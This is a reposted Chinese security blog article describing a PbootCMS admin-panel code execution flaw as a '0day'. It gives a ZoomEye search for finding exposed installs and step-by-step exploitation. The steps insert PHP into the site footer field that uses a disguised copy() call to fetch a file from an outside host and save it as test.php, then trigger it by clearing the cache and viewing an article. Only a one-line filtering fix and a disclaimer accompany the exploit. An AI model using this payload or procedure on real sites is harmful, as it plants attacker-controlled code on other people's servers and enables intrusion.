最新0day! PbootCMS全版本后台通杀任意代码执行漏洞

admin 2024年1月7日22:01:17评论189 views字数 569阅读1分53秒阅读模式

关注本公众号,长期推送技术文章

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!


漏洞简介
PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要。
PbootCMS后台存在任意代码执行漏洞
资产
ZoomEye:app:"PbootCMS"

最新0day! PbootCMS全版本后台通杀任意代码执行漏洞


漏洞复现

工具:

Waf狗王(目录监测)

首先开启目录监测

最新0day! PbootCMS全版本后台通杀任意代码执行漏洞

登录后台

基础内容-站点信息

最新0day! PbootCMS全版本后台通杀任意代码执行漏洞

在尾部信息和统计代码中(其他位置可能效果一样)插入php代码

这里我插入的是以下代码(下载文件并保存为test.php

<?php

$test="copy";

$test("http://IP:8080/1.txt","test.php");

?>

最新0day! PbootCMS全版本后台通杀任意代码执行漏洞

然后来到全局配置-配置参数

打开动态缓存(如果本就打开 那则不需要打开) 点击右上角的清除缓存

最新0day! PbootCMS全版本后台通杀任意代码执行漏洞

最新0day! PbootCMS全版本后台通杀任意代码执行漏洞

然后随便点击任意文章,触发漏洞

最新0day! PbootCMS全版本后台通杀任意代码执行漏洞

最新0day! PbootCMS全版本后台通杀任意代码执行漏洞

临时修复建议:对站点设置的字符进行过滤 不允许插入php脚本

关注公众号,后台回复“交流群”获取技术交流群链接

原文始发于微信公众号(知攻善防实验室):最新0day! PbootCMS全版本后台通杀任意代码执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月7日22:01:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   最新0day! PbootCMS全版本后台通杀任意代码执行漏洞http://cn-sec.com/archives/2348082.html

发表评论

匿名网友 填写信息